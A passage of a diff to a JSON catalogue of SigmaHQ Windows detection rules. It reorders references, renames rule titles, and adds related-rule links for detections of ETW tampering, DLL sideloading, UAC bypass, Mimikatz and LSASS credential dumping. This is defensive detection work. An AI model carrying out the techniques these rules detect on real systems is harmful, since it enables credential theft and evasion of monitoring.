 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml"
 ],
 "tags": [
@@ -15573,17 +19462,17 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
+ "https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/",
+ "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables",
+ "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code",
+ "https://bunnyinside.com/?term=f71e8cb9c76a",
+ "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39",
+ "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_",
+ "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38",
 "http://managed670.rssing.com/chan-5590147/all_p1.html",
 "https://twitter.com/_xpn_/status/1268712093928378368",
- "https://bunnyinside.com/?term=f71e8cb9c76a",
- "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code",
 "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr",
- "https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/",
- "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_",
- "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables",
 "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf",
- "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38",
- "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dot_net_etw_tamper.yml"
 ],
 "tags": [
@@ -15592,34 +19481,18 @@
 "attack.t1562"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "bf4fc428-dcc3-4bbd-99fe-2422aeee2544",
 "value": "ETW Logging Disabled In .NET Processes - Sysmon Registry"
 },
- {
- "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time\n",
- "meta": {
- "author": "frack113",
- "creation_date": "2021/12/30",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "registry_set_shim_databases_persistence.yml",
- "level": "medium",
- "logsource.category": "registry_set",
- "logsource.product": "windows",
- "refs": [
- "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-3---registry-key-creation-andor-modification-events-for-sdb",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_shim_databases_persistence.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1546.011"
- ]
- },
- "uuid": "dfb5b4e8-91d0-4291-b40a-e3b0d3942c45",
- "value": "Registry Key Creation or Modification for Shim DataBase"
- },
 {
 "description": "Detects potential COM object hijacking where the \"Server\" (In/Out) is pointing to a supsicious or unsuale location",
 "meta": {
@@ -15641,8 +19514,17 @@
 "attack.t1546.015"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "bc0f5e80-91c0-4e04-9fbb-e4e332c85dae",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "3d968d17-ffa4-4bc0-bfdc-f139de76ce77",
- "value": "COM Hijacking For Persistence With Suspicious Locations"
+ "value": "Potential Persistence Via COM Hijacking From Suspicious Locations"
 },
 {
 "description": "Detects modification of autostart extensibility point (ASEP) in registry.",
@@ -15659,8 +19541,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
- "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
+ "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_internet_explorer.yml"
 ],
 "tags": [
@@ -15693,6 +19575,15 @@
 "attack.t1003"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "0442defa-b4a2-41c9-ae2c-ea7042fc4701",
 "value": "New Network Provider - Registry"
 },
@@ -15709,8 +19600,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md",
+ "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html",
 "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_function_user.yml"
 ],
@@ -15755,16 +19646,16 @@
 "falsepositive": [
 "Legitimate registration of IFilters by the OS or software"
 ],
- "filename": "registry_set_ifilter_persistence.yml",
+ "filename": "registry_set_persistence_ifilter.yml",
 "level": "medium",
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
 "https://twitter.com/0gtweet/status/1468548924600459267",
- "https://persistence-info.github.io/Data/ifilters.html",
 "https://github.com/gtworek/PSBits/tree/master/IFilter",
+ "https://persistence-info.github.io/Data/ifilters.html",
 "https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/IFilter/Dll.cpp#L281-L308",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_ifilter_persistence.yml"
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_ifilter.yml"
 ],
 "tags": [
 "attack.persistence"
@@ -15810,8 +19701,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://forensafe.com/blogs/typedpaths.html",
 "https://twitter.com/dez_/status/1560101453150257154",
+ "https://forensafe.com/blogs/typedpaths.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_typed_paths.yml"
 ],
 "tags": [
@@ -15819,7 +19710,7 @@
 ]
 },
 "uuid": "086ae989-9ca6-4fe7-895a-759c5544f247",
- "value": "Persistence Via TypedPaths"
+ "value": "Potential Persistence Via TypedPaths"
 },
 {
 "description": "Detects changes to the \"ServiceDLL\" value related to a service in the registry. This is often used as a method of persistence.",
@@ -15835,8 +19726,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md#atomic-test-4---tinyturla-backdoor-service-w64time",
+ "https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_servicedll_hijack.yml"
 ],
 "tags": [
@@ -15894,6 +19785,15 @@
 "attack.t1204.002"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "ff0f2b05-09db-4095-b96d-1b75ca24894a",
 "value": "dotNET DLL Loaded Via Office Applications"
 },
@@ -15912,9 +19812,9 @@
 "logsource.category": "image_load",
 "logsource.product": "windows",
 "refs": [
+ "https://securitydatasets.com/notebooks/small/windows/05_defense_evasion/SDWIN-201017061100.html",
 "https://twitter.com/dez_/status/986614411711442944",
 "https://lolbas-project.github.io/lolbas/Binaries/Wmic/",
- "https://securitydatasets.com/notebooks/small/windows/05_defense_evasion/SDWIN-201017061100.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml"
 ],
 "tags": [
@@ -15922,6 +19822,15 @@
 "attack.t1220"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "ebbe170d-aa74-4946-8511-9921243415a3",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "06ce37c2-61ab-4f05-9ff5-b1a96d18ae32",
 "value": "WMIC Loading Scripting Libraries"
 },
@@ -15947,6 +19856,15 @@
 "attack.t1055"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "0fa66f66-e3f6-4a9c-93f8-4f2610b00171",
 "value": "Potential DLL Sideloading Using Coregen.exe"
 },
@@ -15971,6 +19889,15 @@
 "attack.t1562.002"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "49329257-089d-46e6-af37-4afce4290685",
 "value": "SharpEvtMute Imphash EvtMuteHook Load"
 },
@@ -15987,8 +19914,8 @@
 "logsource.category": "image_load",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/binderlabs/DirCreate2System",
 "https://github.com/sailay1996/awesome_windows_logical_bugs/blob/60cbb23a801f4c3195deac1cc46df27c225c3d07/dir_create2system.txt",
+ "https://github.com/binderlabs/DirCreate2System",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_comctl32.yml"
 ],
 "tags": [
@@ -16016,9 +19943,9 @@
 "logsource.product": "windows",
 "refs": [
 "https://github.com/bohops/WSMan-WinRM",
- "https://twitter.com/chadtilbury/status/1275851297770610688",
- "https://docs.microsoft.com/en-us/windows/win32/winrm/windows-remote-management-architecture",
 "https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/",
+ "https://docs.microsoft.com/en-us/windows/win32/winrm/windows-remote-management-architecture",
+ "https://twitter.com/chadtilbury/status/1275851297770610688",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wsman_provider_image_load.yml"
 ],
 "tags": [
@@ -16028,6 +19955,22 @@
 "attack.t1021.003"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "68a0c5ed-bee2-4513-830d-5b0d650139bd",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "ad1f4bb9-8dfb-4765-adb6-2a7cfb6c0f94",
 "value": "Suspicious WSMAN Provider Image Loads"
 },
@@ -16052,6 +19995,15 @@
 "attack.t1204.002"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "a2a3b925-7bb0-433b-b508-db9003263cc4",
 "value": "Active Directory Parsing DLL Loaded Via Office Applications"
 },
@@ -16078,6 +20030,15 @@
 "attack.t1490"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "333cdbe8-27bb-4246-bf82-b41a0dca4b70",
 "value": "Image Load of VSS_PS.dll by Uncommon Executable"
 },
@@ -16105,6 +20066,15 @@
 "attack.t1574.002"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "a5ea83a7-05a5-44c1-be2e-addccbbd8c03",
 "value": "UAC Bypass With Fake DLL"
 },
@@ -16121,8 +20091,8 @@
 "logsource.category": "image_load",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/tifkin_/status/1321916444557365248",
 "https://twitter.com/rbmaslen/status/1321859647091970051",
+ "https://twitter.com/tifkin_/status/1321916444557365248",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_pcre_net_load.yml"
 ],
 "tags": [
@@ -16130,6 +20100,15 @@
 "attack.t1059"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "84b0a8f3-680b-4096-a45b-e9a89221727c",
 "value": "PCRE.NET Package Image Load"
 },
@@ -16154,6 +20133,15 @@
 "attack.t1204.002"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "90217a70-13fc-48e4-b3db-0d836c5824ac",
 "value": "GAC DLL Loaded Via Office Applications"
 },
@@ -16180,6 +20168,15 @@
 "attack.t1548.002"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "9ed5959a-c43c-4c59-84e3-d28628429456",
 "value": "UAC Bypass Using Iscsicpl - ImageLoad"
 },
@@ -16204,6 +20201,15 @@
 "attack.t1204.002"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "d13c43f0-f66b-4279-8b2c-5912077c1780",
 "value": "CLR DLL Loaded Via Office Applications"
 },
@@ -16256,6 +20262,15 @@
 "car.2019-04-004"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "c0478ead-5336-46c2-bd5e-b4c84bc3a36e",
 "value": "Mimikatz In-Memory"
 },
@@ -16280,6 +20295,15 @@
 "attack.persistence"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "05936ce2-ee05-4dae-9d03-9a391cf2d2c6",
 "value": "WMI Persistence - Command Line Event Consumer"
 },
@@ -16323,12 +20347,12 @@
 "logsource.category": "image_load",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/Wh04m1001/SysmonEoP",
 "https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/",
- "https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/",
 "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992",
- "http://remoteawesomethoughts.blogspot.com/2019/05/windows-10-task-schedulerservice.html",
 "https://decoded.avast.io/martinchlumecky/png-steganography/",
+ "https://github.com/Wh04m1001/SysmonEoP",
+ "http://remoteawesomethoughts.blogspot.com/2019/05/windows-10-task-schedulerservice.html",
+ "https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_non_existent_dlls.yml"
 ],
 "tags": [
@@ -16340,7 +20364,7 @@
 ]
 },
 "uuid": "6b98b92b-4f00-4f62-b4fe-4d1920215771",
- "value": "Sideloading Of Non-Existent DLLs From System Folders"
+ "value": "Potential DLL Sideloading Of Non-Existent DLLs From System Folders"
 },
 {
 "description": "Detects DLL sideloading of DLLs that are part of web browsers",
@@ -16418,6 +20442,15 @@
 "attack.t1490"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "37774c23-25a1-4adb-bb6d-8bb9fd59c0f8",
 "value": "Image Load of VSS Dll by Uncommon Executable"
 },
@@ -16434,8 +20467,8 @@
 "logsource.category": "image_load",
 "logsource.product": "windows",
 "refs": [
- "http://www.windowexe.com/bbs/board.php?q=jsschhlp-exe-c-program-files-common-files-justsystem-jsschhlp-jsschhlp",
 "https://www.welivesecurity.com/2022/12/14/unmasking-mirrorface-operation-liberalface-targeting-japanese-political-entities/",
+ "http://www.windowexe.com/bbs/board.php?q=jsschhlp-exe-c-program-files-common-files-justsystem-jsschhlp-jsschhlp",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_jsschhlp.yml"
 ],
 "tags": [
@@ -16470,6 +20503,15 @@
 "attack.t1071"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "75c505b1-711d-4f68-a357-8c3fe37dbf2d",
 "value": "SILENTTRINITY Stager Execution - DLL"
 },
@@ -16511,10 +20553,10 @@
 "logsource.category": "image_load",
 "logsource.product": "windows",
 "refs": [
- "https://blog.cyble.com/2022/07/21/qakbot-resurfaces-with-new-playbook/",
- "https://hijacklibs.net/",
 "https://github.com/XForceIR/SideLoadHunter/blob/cc7ef2e5d8908279b0c4cee4e8b6f85f7b8eed52/SideLoads/README.md",
+ "https://blog.cyble.com/2022/07/21/qakbot-resurfaces-with-new-playbook/",
 "https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/",
+ "https://hijacklibs.net/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_from_non_system_location.yml"
 ],
 "tags": [
@@ -16526,7 +20568,7 @@
 ]
 },
 "uuid": "4fc0deee-0057-4998-ab31-d24e46e0aba4",
- "value": "System DLL Sideloading From Non System Locations"
+ "value": "Potential System DLL Sideloading From Non System Locations"
 },
 {
 "description": "Detects cmstp loading \"dll\" or \"ocx\" files from suspicious locations",
@@ -16549,6 +20591,15 @@
 "attack.t1218.003"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "4cbc6a62-9e34-4f94-8a19-5c1a11392a49",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "75e508f7-932d-4ebc-af77-269237a84ce1",
 "value": "Cmstp Suspicious DLL Load"
 },
@@ -16573,6 +20624,15 @@
 "attack.t1204.002"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "7417e29e-c2e7-4cf6-a2e8-767228c64837",
 "value": "Active Directory Kerberos DLL Loaded Via Office Applications"
 },
@@ -16589,9 +20649,9 @@
 "logsource.category": "image_load",
 "logsource.product": "windows",
 "refs": [
- "https://www.pinvoke.net/default.aspx/dbghelp/MiniDumpWriteDump.html",
- "https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump",
 "https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6",
+ "https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump",
+ "https://www.pinvoke.net/default.aspx/dbghelp/MiniDumpWriteDump.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_dbghelp_dbgcore_load.yml"
 ],
 "tags": [
@@ -16599,6 +20659,15 @@
 "attack.t1003.001"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "0e277796-5f23-4e49-a490-483131d4f6e1",
 "value": "Load of dbghelp/dbgcore DLL from Suspicious Process"
 },
@@ -16680,6 +20749,15 @@
 "attack.t1021.003"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "68a0c5ed-bee2-4513-830d-5b0d650139bd",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "f354eba5-623b-450f-b073-0b5b2773b6aa",
 "value": "Potential DCOM InternetExplorer.Application DLL Hijack - Image Load"
 },
@@ -16710,7 +20788,7 @@
 "value": "Python Py2Exe Image Load"
 },
 {
- "description": "Detects CLR DLL being loaded by an scripting applications",
+ "description": "Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript",
 "meta": {
 "author": "omkar72, oscd.community",
 "creation_date": "2020/10/14",
@@ -16723,6 +20801,7 @@
 "logsource.product": "windows",
 "refs": [
 "https://github.com/tyranid/DotNetToJScript",
+ "https://web.archive.org/web/20221026202428/https://gist.github.com/code-scrap/d7f152ffcdb3e0b02f7f394f5187f008",
 "https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html",
 "https://thewover.github.io/Introducing-Donut/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml"
@@ -16783,6 +20862,15 @@
 "attack.t1059.001"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "fe6e002f-f244-4278-9263-20e4b593827f",
 "value": "Alternate PowerShell Hosts - Image"
 },
@@ -16835,6 +20923,15 @@
 "attack.t1587"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "edadea33-549c-4ed1-9783-8f5a5853cbdf",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "640dc51c-7713-4faa-8a0e-e7c0d9d4654c",
 "value": "FoggyWeb Backdoor DLL Loading"
 },
@@ -16914,6 +21011,15 @@
 "attack.t1047"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "671bb7e3-a020-4824-a00e-2ee5b55f385e",
 "value": "WMI Modules Loaded"
 },
@@ -16939,6 +21045,15 @@
 "attack.t1003.001"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "8cde342c-ba48-4b74-b615-172c330f2e93",
 "value": "Rundll32 Loading Renamed Comsvcs DLL"
 },
@@ -16964,6 +21079,15 @@
 "cve.2022.30190"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "ec8c4047-fad9-416a-8c81-0f479353d7f6",
 "value": "MSDT.exe Loading Diagnostic Library"
 },
@@ -17012,11 +21136,20 @@
 "attack.t1003.001"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "857c8db3-c89b-42fb-882b-f681c7cf4da2",
 "value": "Unsigned Image Loaded Into LSASS Process"
 },
 {
- "description": "Detects DLL's Loaded Via Word Containing VBA Macros",
+ "description": "Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros.",
 "meta": {
 "author": "Antonlovesdnb",
 "creation_date": "2020/02/19",
@@ -17036,8 +21169,17 @@
 "attack.t1204.002"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "e6ce8457-68b1-485b-9bdd-3c2b5d679aa9",
- "value": "VBA DLL Loaded Via Microsoft Word"
+ "value": "VBA DLL Loaded Via Office Application"
 },
 {
 "description": "Detects when a system process (ie located in system32, syswow64...etc) loads a DLL from a suspicious location such as %temp%",
@@ -17127,8 +21269,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://www.mdsec.co.uk/2020/09/i-like-to-move-it-windows-lateral-movement-part-1-wmi-event-subscription/",
- "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-200902020333.html",
 "https://twitter.com/HunterPlaybook/status/1301207718355759107",
+ "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-200902020333.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_scrcons_imageload_wmi_scripteventconsumer.yml"
 ],
 "tags": [
@@ -17138,6 +21280,15 @@
 "attack.t1546.003"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "b439f47d-ef52-4b29-9a2f-57d8a96cb6b8",
 "value": "WMI Script Host Process Image Loaded"
 },
@@ -17164,6 +21315,15 @@
 "attack.execution"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "092bc4b9-3d1d-43b4-a6b4-8c8acd83522f",
 "value": "In-memory PowerShell"
 },
@@ -17190,6 +21350,15 @@
 "attack.t1021.002"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "7707a579-e0d8-4886-a853-ce47e4575aaa",
 "value": "Wmiprvse Wbemcomn DLL Hijack"
 },
@@ -17269,6 +21438,15 @@
 "cve.2021.34527"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "02fb90de-c321-4e63-a6b9-25f4b03dfd14",
 "value": "Windows Spooler Service Suspicious Binary Load"
 },
@@ -17312,8 +21490,8 @@
 "logsource.category": "image_load",
 "logsource.product": "windows",
 "refs": [
- "https://securitydatasets.com/notebooks/small/windows/06_credential_access/SDWIN-201020013208.html",
 "https://docs.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-creduipromptforcredentialsa",
+ "https://securitydatasets.com/notebooks/small/windows/06_credential_access/SDWIN-201020013208.html",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md#atomic-test-2---powershell---prompt-user-for-password",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml"
 ],
